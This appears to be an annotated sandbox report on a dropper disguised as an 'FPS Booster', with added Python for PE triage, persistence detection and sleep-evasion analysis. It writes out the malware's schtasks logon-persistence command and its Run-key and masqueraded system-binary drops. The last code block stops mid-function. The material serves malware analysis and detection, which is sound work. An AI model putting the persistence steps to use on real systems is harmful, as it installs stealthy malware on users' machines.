                    Source: Binary string: \??\C:\Windows\symbols\exe\Microsoft.VisualStudio.Threading.pdb source: UNFOT5F1qt.exe, 00000000.00000002.1455647318.0000000000C00000.00000004.00000020.00020000.00000000.sdmp
                    Source: UNFOT5F1qt.exe Static PE information: TimeDateStamp 0xE61CCFF4 [Sat May 3 10:12:04 2092 UTC]
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exe Code function: 2_2_004011CF LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleFileNameA,GetEnvironmentVariableA, 2_2_004011CF
                    Source: UNFOT5F1qt.exe Static PE information: real checksum: 0xf8401 should be: 0x11d846
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exe Code function: 0_2_00F31140 pushad ; ret 0_2_00F31141
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe Code function: 5_2_00007FF887B200BD pushad ; iretd 5_2_00007FF887B200C1
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe Code function: 17_2_00007FF887B3A425 push es; retn 7002h 17_2_00007FF887B3A909
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe Code function: 17_2_00007FF887B401DC push es; retn 7002h 17_2_00007FF887B402B9
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe Code function: 17_2_00007FF887B300BD pushad ; iretd 17_2_00007FF887B300C1
                    Source: C:\Windows\regedit\explorer.exe Code function: 18_2_00007FF887B400BD pushad ; iretd 18_2_00007FF887B400C1
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe Code function: 19_2_00007FF887B500BD pushad ; iretd 19_2_00007FF887B500C1
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe Code function: 23_2_00007FF887B2A425 push es; retn 7002h 23_2_00007FF887B2A909
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe Code function: 23_2_00007FF887B3058C push es; retn 7002h 23_2_00007FF887B30669
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe Code function: 23_2_00007FF887B200BD pushad ; iretd 23_2_00007FF887B200C1
                    Source: C:\Windows\regedit\explorer.exe Code function: 27_2_00007FF887C7058C push es; retn 7002h 27_2_00007FF887C70669
                    Source: C:\Windows\regedit\explorer.exe Code function: 27_2_00007FF887C6A425 push es; retn 7002h 27_2_00007FF887C6A909
                    Source: C:\Windows\regedit\explorer.exe Code function: 27_2_00007FF887C600BD pushad ; iretd 27_2_00007FF887C600C1
                    Source: UNFOT5F1qt.exe Static PE information: section name: .text entropy: 7.874259568369085
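The three static rows above (the far-future TimeDateStamp, the checksum mismatch and the .text entropy) can all be reproduced from the PE headers alone. The following Python is an added example written for this page, not Joe Sandbox's code. The sample itself is not available here, so build_sample_pe() assembles a constructed minimal PE32 image that carries the report's header values (TimeDateStamp 0xE61CCFF4, stored CheckSum 0xF8401) with a pseudo-random .text section standing in for packed code; parse_pe, pe_checksum, static_triage and fix_checksum are this example's own names.

```python
"""Static PE triage behind three rows above: the far-future TimeDateStamp, the checksum
mismatch and the .text entropy. Added example, not Joe Sandbox code. The sample is not
available here, so build_sample_pe() assembles a constructed minimal PE32 carrying the
report's header values and a pseudo-random .text section standing in for packed code."""
import math
import random
import struct
from collections import Counter
from datetime import datetime, timezone

COFF_FMT = "<HHIIIHH"        # Machine, NumberOfSections, TimeDateStamp, PtrSymTab, NumSyms, SizeOfOptHdr, Characteristics
CHECKSUM_IN_OPT = 64         # IMAGE_OPTIONAL_HEADER.CheckSum offset within the optional header

def shannon_entropy(data):
    """Bits per byte, 0.0 to 8.0; packed or encrypted sections sit well above 7."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())

def pe_checksum(data, checksum_offset):
    """CheckSum as CheckSumMappedFile computes it: sum of the file as 32-bit words with
    end-around carry, skipping the CheckSum field, folded to 16 bits, plus the file length."""
    total = 0
    padded = data + b"\0" * (-len(data) % 4)
    for off in range(0, len(padded), 4):
        if off == checksum_offset:
            continue
        total += struct.unpack_from("<I", padded, off)[0]
        total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    return ((total + (total >> 16)) & 0xFFFF) + len(data)

def parse_pe(data):
    """Pull the header fields these checks need out of a PE image."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 60)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature missing")
    coff = e_lfanew + 4
    _, nsec, stamp, _, _, opt_size, _ = struct.unpack_from(COFF_FMT, data, coff)
    opt = coff + struct.calcsize(COFF_FMT)
    sections = {}
    for i in range(nsec):                      # 40-byte IMAGE_SECTION_HEADERs follow the optional header
        name, _, _, raw_size, raw_ptr = struct.unpack_from("<8sIIII", data, opt + opt_size + 40 * i)
        sections[name.rstrip(b"\0").decode("ascii")] = data[raw_ptr:raw_ptr + raw_size]
    checksum_off = opt + CHECKSUM_IN_OPT
    return {"timestamp": stamp, "checksum_offset": checksum_off,
            "stored_checksum": struct.unpack_from("<I", data, checksum_off)[0],
            "sections": sections}

def static_triage(data, now=None):
    """The three checks from the report, returned as (kind, detail) pairs."""
    now = now or datetime.now(timezone.utc)
    pe = parse_pe(data)
    findings = []
    built = datetime.fromtimestamp(pe["timestamp"], tz=timezone.utc)
    if built > now or built.year < 1990:
        findings.append(("timestamp", f"TimeDateStamp {pe['timestamp']:#x} = {built:%Y-%m-%d %H:%M:%S} UTC"))
    computed = pe_checksum(data, pe["checksum_offset"])
    if computed != pe["stored_checksum"]:
        findings.append(("checksum", f"stored {pe['stored_checksum']:#x}, computed {computed:#x}"))
    for name, body in pe["sections"].items():
        entropy = shannon_entropy(body)
        if entropy > 7.2:
            findings.append(("entropy", f"section {name} entropy {entropy:.2f}"))
    return findings

def fix_checksum(data):
    """Copy of the image with CheckSum rewritten to the computed value, as a linker would."""
    pe = parse_pe(data)
    patched = bytearray(data)
    struct.pack_into("<I", patched, pe["checksum_offset"], pe_checksum(data, pe["checksum_offset"]))
    return bytes(patched)

def build_sample_pe(timestamp=0xE61CCFF4, stored_checksum=0xF8401, text_size=4096, seed=1):
    """Constructed PE32: DOS header, PE signature, COFF header, 224-byte optional header,
    one .text section at file offset 512. Only the fields parse_pe() reads are meaningful."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 64)               # e_lfanew = 64
    coff = struct.pack(COFF_FMT, 0x14C, 1, timestamp, 0, 0, 224, 0x102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                             # PE32 magic
    struct.pack_into("<I", opt, CHECKSUM_IN_OPT, stored_checksum)
    section = struct.pack("<8sIIIIIIHHI", b".text", text_size, 0x1000, text_size, 512,
                          0, 0, 0, 0, 0x60000020)
    headers = dos + b"PE\0\0" + coff + bytes(opt) + section
    headers += b"\0" * (512 - len(headers))
    return headers + random.Random(seed).randbytes(text_size)
```

Two caveats before weighting these rows. A stored CheckSum that is non-zero but wrong, as here, usually means the file was altered after the linker wrote it (typical of packers and crypters), which lines up with the 7.87 entropy of .text; on its own, though, a bad checksum is weak evidence, because Windows only enforces it for kernel drivers and a few boot-critical system DLLs and plenty of legitimate user-mode binaries ship with it unset. The timestamp is similarly weak for managed code: Roslyn's deterministic builds store a hash of the compilation inputs in TimeDateStamp rather than a build time, and such values routinely decode to dates decades in the future. What makes this sample worth a look is the combination, not any single row.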

                    Persistence and Installation Behavior

                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create (8 calls)
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exe File created: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exe File created: C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exe
                    Source: C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exe File created: C:\Users\user\AppData\Local\Temp\nss20C1.tmp\nsDialogs.dll
                    Source: C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exe File created: C:\Users\user\AppData\Local\Temp\nss20C1.tmp\System.dll
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe File created: C:\Windows\regedit\explorer.exe
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe File created: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe File created: C:\Users\Default\WmiPrvSE.exe
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe File created: C:\Users\Public\Pictures\RuntimeBroker.exe
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe File created: C:\Recovery\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe File created: C:\ProgramData\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe File created: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe
                    Source: unknown Executable created and started: C:\Windows\regedit\explorer.exe
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe Executable created and started: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe

                    Boot Survival

                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WerFault (written 4 times)
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WmiPrvSE (written 3 times)
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBroker (written 3 times)
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run explorer (written 3 times)
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run HSZUYllrTVQhIRaXpKBgYbmVnCoTc (written 7 times)
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe File created: C:\Users\Default\WmiPrvSE.exe
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "HSZUYllrTVQhIRaXpKBgYbmVnCoTc" /sc ONLOGON /tr "'C:\Recovery\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe'" /rl HIGHEST /f
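The dropped-file, Run-value and schtasks rows in the two sections above map onto a handful of host-side checks: a system binary name outside its genuine directory, an autostart image under a root where no legitimate autostart belongs, and a logon task with /rl HIGHEST pointing at such a root. The following Python is an added example written for this page, not Joe Sandbox's or the malware's code; it runs those checks over a constructed event list built from the report's rows (the event field names are this example's own, not Sysmon's schema). Two details are assumptions rather than report findings: the Run value data is not shown, so the WerFault value is paired with the MsRdpWebAccess\WerFault.exe drop, and the schtasks process is given a WmiPrvSE.exe parent to illustrate what the Win32_Process::Create rows look like in process telemetry.

```python
"""Host-side checks for the persistence rows above. Added example, not Joe Sandbox code;
the events below are constructed from the report's rows and their field layout is this
example's own, not Sysmon's schema."""
import ntpath
import re

# Genuine home directories of the Windows binaries whose names this sample reuses
# (WinSxS copies left out on purpose: none of the report's drops land there).
SYSTEM_NAMES = {
    "explorer.exe":      {"c:\\windows"},
    "werfault.exe":      {"c:\\windows\\system32", "c:\\windows\\syswow64"},
    "wmiprvse.exe":      {"c:\\windows\\system32\\wbem", "c:\\windows\\syswow64\\wbem"},
    "runtimebroker.exe": {"c:\\windows\\system32"},
}
# Roots where no legitimate autostart binary should live (assumed list; extend per estate).
SUSPICIOUS_ROOTS = ("c:\\recovery\\", "c:\\programdata\\",
                    "c:\\users\\public\\", "c:\\users\\default\\")
USER_TEMP = re.compile(r"^c:\\users\\[^\\]+\\appdata\\local\\temp\\", re.I)
SCHTASKS_ARG = re.compile(r'/(\w+)(?:\s+("[^"]*"|[^\s/]\S*))?')

def system_name_in_unexpected_location(path):
    """Known system binary name whose directory is not one of its genuine homes."""
    name = ntpath.basename(path).lower()
    if name not in SYSTEM_NAMES:
        return False
    return ntpath.dirname(path).lower() not in SYSTEM_NAMES[name]

def in_suspicious_root(path):
    low = path.lower()
    return low.startswith(SUSPICIOUS_ROOTS) or bool(USER_TEMP.match(low))

def parse_schtasks(cmdline):
    """Map each /switch of a schtasks.exe line to its value (None for bare switches such as
    /create and /f); strips the double quotes and the single quotes this dropper adds."""
    args = {}
    for m in SCHTASKS_ARG.finditer(cmdline):
        value = m.group(2)
        if value is not None:
            value = value.strip('"').strip("'")
        args[m.group(1).lower()] = value
    return args

def schtasks_is_suspicious(cmdline):
    """Reasons a schtasks /create line deserves a look; empty list when none apply."""
    args = parse_schtasks(cmdline)
    reasons = []
    if "create" not in args:
        return reasons
    if (args.get("sc") or "").upper() == "ONLOGON":
        reasons.append("runs at every logon")
    if (args.get("rl") or "").upper() == "HIGHEST":
        reasons.append("requests highest privileges")
    target = args.get("tr") or ""
    if in_suspicious_root(target):
        reasons.append("task target in non-standard root: " + target)
    return reasons

def run_value_is_suspicious(value_name, image_path):
    """Reasons an HKLM\\...\\CurrentVersion\\Run value deserves a look."""
    reasons = []
    if system_name_in_unexpected_location(image_path):
        reasons.append("system binary name outside its genuine directory")
    if in_suspicious_root(image_path):
        reasons.append("autostart image in non-standard root")
    if value_name.lower() + ".exe" in SYSTEM_NAMES:
        reasons.append("Run value named after a system process that Windows never starts via Run")
    return reasons

def triage(events):
    """Run every check over the event list and return (artifact, reason) pairs."""
    findings = []
    for ev in events:
        if ev["type"] == "file_create":
            path = ev["path"]
            if system_name_in_unexpected_location(path):
                findings.append((path, "system binary name outside its genuine directory"))
            if path.lower().endswith(".exe") and in_suspicious_root(path):
                findings.append((path, "executable dropped into non-standard root"))
        elif ev["type"] == "run_value":
            for reason in run_value_is_suspicious(ev["name"], ev["image"]):
                findings.append(("Run\\" + ev["name"], reason))
        elif ev["type"] == "process_create":
            if ntpath.basename(ev.get("parent", "")).lower() == "wmiprvse.exe":
                findings.append((ev["cmdline"], "spawned through WMI (parent is WmiPrvSE.exe)"))
            for reason in schtasks_is_suspicious(ev["cmdline"]):
                findings.append((ev["cmdline"], reason))
    return findings

SCHTASKS_CMD = (r'''schtasks.exe /create /tn "HSZUYllrTVQhIRaXpKBgYbmVnCoTc" /sc ONLOGON '''
                r'''/tr "'C:\Recovery\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe'" /rl HIGHEST /f''')
# Constructed from the report's rows; the WerFault Run data and the schtasks parent are assumptions.
SAMPLE_EVENTS = [
    {"type": "file_create", "path": r"C:\Windows\regedit\explorer.exe"},
    {"type": "file_create", "path": r"C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe"},
    {"type": "file_create", "path": r"C:\Users\Default\WmiPrvSE.exe"},
    {"type": "file_create", "path": r"C:\Windows\System32\WerFault.exe"},  # genuine, control
    {"type": "run_value", "name": "WerFault", "image": r"C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe"},
    {"type": "process_create", "cmdline": SCHTASKS_CMD, "parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe"},
]
```

Matching is case-insensitive throughout, and the root list deliberately does not cover C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList, where the sample also dropped a copy; a per-directory allow-list for Program Files subtrees, or a check that the target directory normally holds no executables at all, is the usual way to catch that one. Children of WmiPrvSE.exe are also spawned by legitimate management tooling, so that flag is context for the other findings, not a verdict on its own.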
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exe Process information set: NOOPENFILEERRORBOX (30 times)
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe Process information set: NOOPENFILEERRORBOX (39 times)
                    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX (5 times)
                    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX (51 times)
                    Source: C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe Process information set: NOOPENFILEERRORBOX (31 times)
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\regedit\explorer.exe Process information set: NOOPENFILEERRORBOX (26 identical entries)
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe Process information set: NOOPENFILEERRORBOX (71 identical entries)
                    Source: C:\Windows\regedit\explorer.exe Process information set: NOOPENFILEERRORBOX (45 identical entries)

                    Malware Analysis System Evasion

                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess (graph_2-249)
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exe Memory allocated: EF0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exe Memory allocated: 2A40000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exe Memory allocated: 2810000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe Memory allocated: 1200000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe Memory allocated: 1AB80000 memory reserve | memory write watch
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe Memory allocated: C90000 memory reserve | memory write watch
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe Memory allocated: 1A630000 memory reserve | memory write watch
                    Source: C:\Windows\regedit\explorer.exe Memory allocated: FC0000 memory reserve | memory write watch
                    Source: C:\Windows\regedit\explorer.exe Memory allocated: 1ACD0000 memory reserve | memory write watch
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe Memory allocated: 1080000 memory reserve | memory write watch
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe Memory allocated: 1AE70000 memory reserve | memory write watch
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe Memory allocated: CC0000 memory reserve | memory write watch
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe Memory allocated: 1A7C0000 memory reserve | memory write watch
                    Source: C:\Windows\regedit\explorer.exe Memory allocated: 8C0000 memory reserve | memory write watch
                    Source: C:\Windows\regedit\explorer.exe Memory allocated: 1A390000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exe Code function: 2_2_004012D9 rdtsc 2_2_004012D9
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe Thread delayed: delay time: 600000
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe Thread delayed: delay time: 599889
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe Thread delayed: delay time: 599781
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe Thread delayed: delay time: 599672
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe Thread delayed: delay time: 599321
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\regedit\explorer.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe Thread delayed: delay time: 600000
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe Thread delayed: delay time: 599874
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe Thread delayed: delay time: 599765
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe Thread delayed: delay time: 599656
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe Thread delayed: delay time: 599547
                    Source: C:\Windows\regedit\explorer.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\regedit\explorer.exe Thread delayed: delay time: 600000
                    Source: C:\Windows\regedit\explorer.exe Thread delayed: delay time: 599890
                    Source: C:\Windows\regedit\explorer.exe Thread delayed: delay time: 599781
                    Source: C:\Windows\regedit\explorer.exe Thread delayed: delay time: 599672
                    Source: C:\Windows\regedit\explorer.exe Thread delayed: delay time: 599562
                    Source: C:\Windows\regedit\explorer.exe Thread delayed: delay time: 599453
                    Source: C:\Windows\regedit\explorer.exe Thread delayed: delay time: 599343
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe Window / User API: threadDelayed 558
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe Window / User API: threadDelayed 675
                    Source: C:\Windows\regedit\explorer.exe Window / User API: threadDelayed 1195
                    Source: C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nss20C1.tmp\nsDialogs.dll
                    Source: C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nss20C1.tmp\System.dll
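The delay values in the thread entries of this section decode as follows. 922337203685477 is 2^63 / 10000, the whole-millisecond form of the most negative relative interval NtDelayExecution accepts (0x8000000000000000 in 100 ns units), which is what Sleep(INFINITE) hands to the kernel: it marks a thread parked indefinitely, not a literal multi-millennium sleep. The per-thread sleep totals 1844674407370954, 2767011611056431 and 4611686018427385 reported for TIDs 7888, 8120 and 4476 are exactly 2, 3 and 5 times that value. The descending series 600000, 599889, 599781, ... reads as a ten-minute wait re-issued with the remaining time after an early wake-up, which is the pattern sandbox sleep-skipping provokes and the one worth separating from parked threads. The script below is an added example, not part of the Joe Sandbox report: it parses lines in the format shown here (the sample input is copied from this section with the path and the event separated by a space), groups the events per process and flags the timed-stall pattern. It assumes the report's delay values are milliseconds, and it reports the write-watch reservations and NOOPENFILEERRORBOX error-mode calls as plain counts rather than as evidence on their own.

```python
"""Triage of Joe Sandbox behaviour lines like the ones in this section (added example)."""
import re
from collections import defaultdict

# Sleep(INFINITE) reaches NtDelayExecution as the most negative relative interval,
# 0x8000000000000000 in 100 ns units; in whole milliseconds that is the
# 922337203685477 the report shows, i.e. an indefinite wait, not a 29,000-year sleep.
INFINITE_MS = (1 << 63) // 10_000  # 922337203685477

# ASSUMPTION: the report's delay values are milliseconds, so its "-30000s"
# comparison is a 30-second sleep-skipping cut-off.
SKIP_THRESHOLD_MS = 30_000

# Accepts the cleaned form ("...exe Thread sleep time: ...") and the raw extraction
# where path and event are fused ("...exeThread sleep time: ...Jump to behavior").
LINE_RE = re.compile(
    r"^Source:\s*(?P<proc>.+?\.exe)\s*(?:TID:\s*(?P<tid>\d+))?\s*"
    r"(?P<kind>Thread delayed: delay time|Thread sleep time|Thread sleep count|"
    r"Window / User API|Memory allocated|Process information set|Code function)"
    r"[:\s]*(?P<rest>.*?)(?:Jump to \w+.*)?$"
)


def classify_delay(ms: int) -> str:
    """Label one delay value the way an analyst reads it."""
    if ms >= INFINITE_MS and ms % INFINITE_MS == 0:
        n = ms // INFINITE_MS
        return "infinite wait" if n == 1 else f"{n}x infinite wait"
    if ms >= SKIP_THRESHOLD_MS:
        return f"long timed wait ({ms / 60_000:.1f} min)"
    return "short wait"


def _first_int(text: str) -> int:
    return abs(int(re.search(r"-?\d+", text).group()))


def triage(lines):
    """Group the evasion-relevant events of each process."""
    procs = defaultdict(lambda: {
        "infinite_waits": 0,      # Sleep(INFINITE)-style parked threads
        "long_waits_ms": [],      # timed waits >= SKIP_THRESHOLD_MS, in report order
        "sleep_loop_max": 0,      # largest sleep-loop iteration count reported
        "rdtsc": False,           # timing check via rdtsc
        "write_watch_allocs": 0,  # MEM_WRITE_WATCH reservations, counted only
        "noopenfileerrorbox": 0,  # SetErrorMode(SEM_NOOPENFILEERRORBOX) calls, counted only
        "tids": {},               # TID -> label of its largest reported sleep
    })
    for raw in lines:
        m = LINE_RE.match(raw.strip())
        if not m:
            continue
        p, kind, rest = procs[m["proc"]], m["kind"], m["rest"]
        if kind == "Thread delayed: delay time":
            ms = _first_int(rest)
            label = classify_delay(ms)
            if label.endswith("infinite wait"):
                p["infinite_waits"] += 1
            elif label.startswith("long"):
                p["long_waits_ms"].append(ms)
        elif kind == "Thread sleep time":
            tid = m["tid"] or "?"
            p["tids"][tid] = max(p["tids"].get(tid, 0), _first_int(rest))
        elif kind in ("Thread sleep count", "Window / User API"):
            p["sleep_loop_max"] = max(p["sleep_loop_max"], _first_int(rest))
        elif kind == "Code function" and "rdtsc" in rest:
            p["rdtsc"] = True
        elif kind == "Memory allocated" and "write watch" in rest:
            p["write_watch_allocs"] += 1
        elif kind == "Process information set" and "NOOPENFILEERRORBOX" in rest:
            p["noopenfileerrorbox"] += 1
    for p in procs.values():
        p["tids"] = {tid: classify_delay(ms) for tid, ms in p["tids"].items()}
    return dict(procs)


def sleep_evasion_suspects(stats):
    """Processes whose waits look like a timed stall rather than a parked thread.

    Infinite waits alone are how a RAT's main thread idles after spawning workers.
    A shrinking series of long waits (600000, 599889, 599781, ...) is consistent
    with a loop re-issuing the remaining wait after an early wake-up, which is what
    sandbox sleep-skipping provokes; a high loop count or an rdtsc check adds to it.
    """
    suspects = []
    for proc, s in stats.items():
        lw = s["long_waits_ms"]
        shrinking = sum(1 for a, b in zip(lw, lw[1:]) if 0 < a - b < SKIP_THRESHOLD_MS)
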